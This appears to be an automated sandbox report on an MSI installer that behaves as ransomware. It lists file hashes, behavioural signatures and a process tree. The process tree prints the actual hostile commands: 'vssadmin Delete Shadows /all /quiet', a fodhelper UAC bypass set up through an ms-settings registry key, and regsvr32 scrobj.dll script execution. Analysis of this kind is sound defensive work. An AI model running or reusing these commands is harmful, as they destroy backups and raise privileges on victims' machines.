Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 03:43
Static task
static1
Behavioral task
behavioral1
Sample
66.msi
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
66.msi
Resource
win10v2004-20220414-en
General
-
Target
66.msi
-
Size
96KB
-
MD5
5d4e40d1d41c4588fbf7065fa85454e7
-
SHA1
ca876c335ef0a4d90b456f13cc975c04016a5cc1
-
SHA256
4c7314083933a283c87dc28abbed3082040f12e92edac47ff72f8539af6e3ea1
-
SHA512
5f86b37bbdd97ec632e0098d5c2ff71c0a23f547a27493d88d5a0cfa0342e45c39fc79ddbb42e4103a08e7e8a71b88412ca45cbb3b1aed615fdbe4c50d647f3c
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
MsiExec.exedescription ioc process File renamed C:\Users\Admin\Pictures\BackupApprove.raw => C:\Users\Admin\Pictures\BackupApprove.raw.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\GetOptimize.crw => C:\Users\Admin\Pictures\GetOptimize.crw.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\UpdateJoin.png => C:\Users\Admin\Pictures\UpdateJoin.png.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\DenyAdd.crw => C:\Users\Admin\Pictures\DenyAdd.crw.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\InstallBackup.raw => C:\Users\Admin\Pictures\InstallBackup.raw.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\CompressSwitch.tif => C:\Users\Admin\Pictures\CompressSwitch.tif.xqvpjsclg MsiExec.exe File opened for modification C:\Users\Admin\Pictures\EditStart.tiff MsiExec.exe File renamed C:\Users\Admin\Pictures\EditStart.tiff => C:\Users\Admin\Pictures\EditStart.tiff.xqvpjsclg MsiExec.exe File renamed C:\Users\Admin\Pictures\GrantUninstall.tif => C:\Users\Admin\Pictures\GrantUninstall.tif.xqvpjsclg MsiExec.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid process 928 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid process target process PID 928 set thread context of 2648 928 MsiExec.exe sihost.exe PID 928 set thread context of 2716 928 MsiExec.exe svchost.exe PID 928 set thread context of 2792 928 MsiExec.exe taskhostw.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\bed09973-71fe-469f-9197-1b9db5615ee3.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523054346.pma setup.exe -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\e56d4c9.msi msiexec.exe File created C:\Windows\Installer\SourceHash{1FB7F52F-AE2D-47D5-93EC-49261060D88C} msiexec.exe File opened for modification C:\Windows\Installer\MSID94F.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSID5C3.tmp msiexec.exe File created C:\Windows\Installer\e56d4cb.msi msiexec.exe File opened for modification C:\Windows\Installer\e56d4c9.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e111c2ed168134740000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e111c2ed0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900e111c2ed000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e111c2ed00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e111c2ed00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5876 vssadmin.exe 5912 vssadmin.exe 3668 vssadmin.exe 2712 vssadmin.exe 4356 vssadmin.exe 5836 vssadmin.exe -
Modifies registry class 15 IoCs
Processes:
regsvr32.exesihost.exeregsvr32.exemsedge.exeregsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exepid process 4936 msiexec.exe 4936 msiexec.exe 928 MsiExec.exe 928 MsiExec.exe 376 msedge.exe 376 msedge.exe 1344 msedge.exe 1344 msedge.exe 1508 identity_helper.exe 1508 identity_helper.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid process 928 MsiExec.exe 928 MsiExec.exe 928 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 1344 msedge.exe 1344 msedge.exe 1344 msedge.exe 1344 msedge.exe 1344 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid process Token: SeShutdownPrivilege 3124 msiexec.exe Token: SeIncreaseQuotaPrivilege 3124 msiexec.exe Token: SeSecurityPrivilege 4936 msiexec.exe Token: SeCreateTokenPrivilege 3124 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3124 msiexec.exe Token: SeLockMemoryPrivilege 3124 msiexec.exe Token: SeIncreaseQuotaPrivilege 3124 msiexec.exe Token: SeMachineAccountPrivilege 3124 msiexec.exe Token: SeTcbPrivilege 3124 msiexec.exe Token: SeSecurityPrivilege 3124 msiexec.exe Token: SeTakeOwnershipPrivilege 3124 msiexec.exe Token: SeLoadDriverPrivilege 3124 msiexec.exe Token: SeSystemProfilePrivilege 3124 msiexec.exe Token: SeSystemtimePrivilege 3124 msiexec.exe Token: SeProfSingleProcessPrivilege 3124 msiexec.exe Token: SeIncBasePriorityPrivilege 3124 msiexec.exe Token: SeCreatePagefilePrivilege 3124 msiexec.exe Token: SeCreatePermanentPrivilege 3124 msiexec.exe Token: SeBackupPrivilege 3124 msiexec.exe Token: SeRestorePrivilege 3124 msiexec.exe Token: SeShutdownPrivilege 3124 msiexec.exe Token: SeDebugPrivilege 3124 msiexec.exe Token: SeAuditPrivilege 3124 msiexec.exe Token: SeSystemEnvironmentPrivilege 3124 msiexec.exe Token: SeChangeNotifyPrivilege 3124 msiexec.exe Token: SeRemoteShutdownPrivilege 3124 msiexec.exe Token: SeUndockPrivilege 3124 msiexec.exe Token: SeSyncAgentPrivilege 3124 msiexec.exe Token: SeEnableDelegationPrivilege 3124 msiexec.exe Token: SeManageVolumePrivilege 3124 msiexec.exe Token: SeImpersonatePrivilege 3124 msiexec.exe Token: SeCreateGlobalPrivilege 3124 msiexec.exe Token: SeBackupPrivilege 2244 vssvc.exe Token: SeRestorePrivilege 2244 vssvc.exe Token: SeAuditPrivilege 2244 vssvc.exe Token: SeBackupPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe Token: SeTakeOwnershipPrivilege 4936 msiexec.exe Token: SeRestorePrivilege 4936 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
msiexec.exemsedge.exepid process 3124 msiexec.exe 3124 msiexec.exe 1344 msedge.exe 1344 msedge.exe 1344 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exedescription pid process target process PID 4936 wrote to memory of 2224 4936 msiexec.exe srtasks.exe PID 4936 wrote to memory of 2224 4936 msiexec.exe srtasks.exe PID 4936 wrote to memory of 928 4936 msiexec.exe MsiExec.exe PID 4936 wrote to memory of 928 4936 msiexec.exe MsiExec.exe PID 2648 wrote to memory of 748 2648 sihost.exe regsvr32.exe PID 2648 wrote to memory of 748 2648 sihost.exe regsvr32.exe PID 2716 wrote to memory of 4468 2716 svchost.exe regsvr32.exe PID 2716 wrote to memory of 4468 2716 svchost.exe regsvr32.exe PID 2792 wrote to memory of 4520 2792 taskhostw.exe regsvr32.exe PID 2792 wrote to memory of 4520 2792 taskhostw.exe regsvr32.exe PID 928 wrote to memory of 956 928 MsiExec.exe cmd.exe PID 928 wrote to memory of 956 928 MsiExec.exe cmd.exe PID 956 wrote to memory of 1344 956 cmd.exe msedge.exe PID 956 wrote to memory of 1344 956 cmd.exe msedge.exe PID 1344 wrote to memory of 2288 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 2288 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1048 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 376 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 376 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe PID 1344 wrote to memory of 1308 1344 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd32⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd32⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/oz4xz8wjjjd32⤵
- Modifies registry class
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/kfx5819s5b4⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\66.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding D5407ADCBB0E3C6AB912816C764089402⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg^&1^&38633491^&78^&399^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://de48d64898xqvpjsclg.raredo.info/xqvpjsclg&1&38633491&78&399&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a07746f8,0x7ff8a0774708,0x7ff8a07747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5100 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16387802422754391886,11370813378049650263,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3708 /prefetch:85⤵
-
